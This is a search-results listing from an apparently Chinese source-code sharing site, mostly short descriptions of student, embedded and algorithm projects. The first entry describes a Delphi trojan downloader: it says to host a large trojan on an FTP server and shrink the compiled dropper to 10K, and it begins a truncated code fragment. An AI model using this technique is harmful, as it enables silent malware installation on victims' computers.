搜索资源列表
mydown
- 执行后可以下载指定程序并执行 你先把大体积木马放到一固定FTP空间上 打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:) 用工具压一下,只有10K 这样说完是不行的,说一下代码: program wsdgsRoad uses URLMon, ShellApi var u,l: pchar {.$R *.res} function DownloadF
Linuxkernel-SourceFile
- 0。11版linux代码,对学习linux和提高c语言有帮助-0. 11 version of Linux code, to learn and improve linux c language help
SourceFile
- 利用资源文件自定义安装包!-use of resources document custom installation package!
SourceFile
- msp430简易交流频率测试 msp430简易交流频率测试
SourceFile
- PS2鼠标实验Verilog HDL代码
SourceFile
- PS2键盘实验Verilog HDL代码
sourceFile
- 在一段时间内,如果用户没有进行按键操作,系统将进入“睡眠”--低功耗状态 * 用户按键后,系统从低功耗状态转到正常的工作状态 * 在非低功耗状态下,程序接收键盘按键执行加法器操作(因为键盘和LCD限制不能实现复杂 * 的功能,如乘法、减法、除法等)
Huffmancodeandreport
- C++实现的哈弗曼编码,并有流程图(1)I:初始化(Initialization)。从指定的英文文件中Sourcefile.txt读取数据,根据文件内容统计的字符的频度,建立哈夫曼树。 (2)E:编码(Encoding)。利用已经建好的哈夫曼树进行编码,并将每个字符的编码写入文件HuffCode.txt中保存。 (3)C:压缩(Compress)。根据HuffCode.txt中编码对文件Sourcefile.txt进行重新编码,并将重新编码后的内容写入文件CodeFile.txt中。
mycopy
- 考察缓冲区大小对低级I/O操作的影响 了解文件随机访问技术.编写程序mycopy,实现文件拷贝。 命令行格式为: mycopy sourcefile destfile
sourceFile
- 使用口线模拟I2C总线,读写EEPROM的方法
sourcefile
- 这是Visualc C++程序设计教程上的源代码
sourceFile
- 输入三个学生的成绩,然后根据提示信息,可以选择学生平均成绩、单科最高分、总分以及成绩排名等各种计算。
K-means算法源码
- kmeans This directory contains code implementing the K-means algorithm. Source code may be found in KMEANS.CPP. Sample data isfound in KM2.DAT. The KMEANS program accepts input consisting of vectors and calculates the given number of cluster centers
sift_vs2008
- This programs is a sift algorithm sourcefile written by Visual Studio 2008. This is written by MFC. Simply, just compile and run to use.
SourceFile
- ks0108 12864液晶程序,包含键盘扫描程序-LCD ks0108 12864 procedures, including the keyboard scanner
gdal-1.6.0.7z
- 不容易啊,我终于编译出了支持MODIS_HDF4和HDF5格式的GDAL了。 它是在VC++2005下的GDAL1.6版本。 不过还不知道兼容性,因为是在64 位机上编译的32位库 不过说明,这是配置好的源码-GDAL 1.6.0 sourcefile with hdf plugins. you can compile directory with VC++2005
C++SourceFile
- 一些比较实用的C++程序~,希望能对大家有所帮助!-Some of the more practical C++ Procedures ~, hoping to help all of you!
sourcefile
- G723语音压缩算法原程序,参考-G723 sound fw
sourcefile
- 在Altera公司的Cyclone系列FPGA开发板上试验的按键中断程序,希望对那些学习中断开发的初学者有帮助。 pio_key.v是verilog编写的按键中断程序,对应四个按键,按其中任何一个键都可以发送一个中断; keyint.c是Nios中编写的C程序,用于检测按键的中断,如果检测到中断,会检测是哪个按键按下,从而执行相应的程序! -In Altera' s Cyclone series FPGA development board interrupt key test
iFileCopy
- int iCopyFile(char*sourcefile,char*destinationfile) Purpose: Copy SourceFile to DestinationFile - line by line.-int iCopyFile(char*sourcefile,char*destinationfile) Purpose: Copy SourceFile to DestinationFile- line by line.